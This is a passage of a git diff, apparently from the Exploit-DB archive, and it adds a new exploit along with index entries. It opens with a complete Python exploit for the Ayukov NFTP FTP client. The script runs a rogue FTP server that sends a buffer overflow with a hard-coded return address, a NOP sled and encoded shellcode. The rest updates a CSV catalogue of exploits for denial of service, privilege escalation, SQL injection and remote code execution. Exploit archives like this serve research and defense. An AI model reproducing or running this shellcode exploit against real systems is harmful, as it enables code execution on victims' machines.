-b '\x00\x0A\x0D' -f python + +import socket + +IP = '192.168.43.28' +port = 21 + +buf = "" +buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29" +buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e" +buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15" +buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f" +buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f" +buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad" +buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64" +buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61" +buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c" +buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9" +buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9" +buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9" +buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1" +buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7" +buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f" +buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89" +buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05" +buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe" +buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba" +buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15" +buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3" +buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32" +buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4" +buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b" +buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7" +buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72" +buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd" +buf += "\xa4\x03\x5f\xc4" + +evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425 + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((IP, port)) + s.listen(20) + print("[i] FTP Server started on port: "+str(port)+"\r\n") +except: + print("[!] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome!' + '\r\n') + print conn.recv(1024) + conn.send('331 OK.\r\n') + print conn.recv(1024) + conn.send('230 OK.\r\n') + print conn.recv(1024) + conn.send(evil + '\r\n') + print conn.recv(1024) + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9fd0ff253..a1073f50f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5979,6 +5979,8 @@ id,file,description,date,author,type,platform,port 44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux, 44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows, 44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware, +46068,exploits/windows_x86-64/dos/46068.py,"EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)",2019-01-02,Achilles,dos,windows_x86-64, +46069,exploits/windows_x86-64/dos/46069.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64, 44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86, 44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux, 44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android, @@ -6229,6 +6231,9 @@ id,file,description,date,author,type,platform,port 46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, 46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, 46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, +46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64, +46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple, +46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9985,6 +9990,7 @@ id,file,description,date,author,type,platform,port 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, +46070,exploits/windows_x86/local/46070.py,"Ayukov NFTP FTP Client 2.0 - Buffer Overflow",2019-01-02,"Uday Mittal",local,windows_x86, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, 44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, 44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows, @@ -17043,6 +17049,8 @@ id,file,description,date,author,type,platform,port 46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple, 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, +46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux, +46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39902,6 +39910,8 @@ id,file,description,date,author,type,platform,port 44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php, 44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php, 44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php, +46066,exploits/php/webapps/46066.txt,"WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection",2019-01-02,Kaimi,webapps,php,80 +46067,exploits/php/webapps/46067.txt,"Frog CMS 0.9.5 - Cross-Site Scripting",2019-01-02,WangDudu,webapps,php,80 44706,exploits/php/webapps/44706.txt,"EasyService Billing 1.0 - SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, 44707,exploits/php/webapps/44707.txt,"EasyService Billing 1.0 - 'p1' SQL Injection",2018-05-23,AkkuS,webapps,php, 44708,exploits/php/webapps/44708.txt,"MySQL Smart Reports 1.0 - 'id' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, @@ -40537,13 +40547,14 @@ id,file,description,date,author,type,platform,port 46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443 -46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php, -46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php, +46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,80 +46035,exploits/php/webapps/46035.txt,"WSTMart 2.0.8 - Cross-Site Scripting",2018-12-24,linfeng,webapps,php,80 46036,exploits/php/webapps/46036.txt,"WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)",2018-12-24,linfeng,webapps,php, -46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php, +46037,exploits/php/webapps/46037.txt,"FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection",2018-12-24,"Sainadh Jamalpur",webapps,php,80 46041,exploits/php/webapps/46041.py,"phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read",2018-12-15,VulnSpy,webapps,php, 46050,exploits/php/webapps/46050.txt,"PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)",2018-11-30,"Alex Leahu",webapps,php, -46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php, +46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80 46055,exploits/php/webapps/46055.txt,"WordPress Plugin Audio Record 1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php, -46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php, -46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php, +46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80 +46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80 +46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,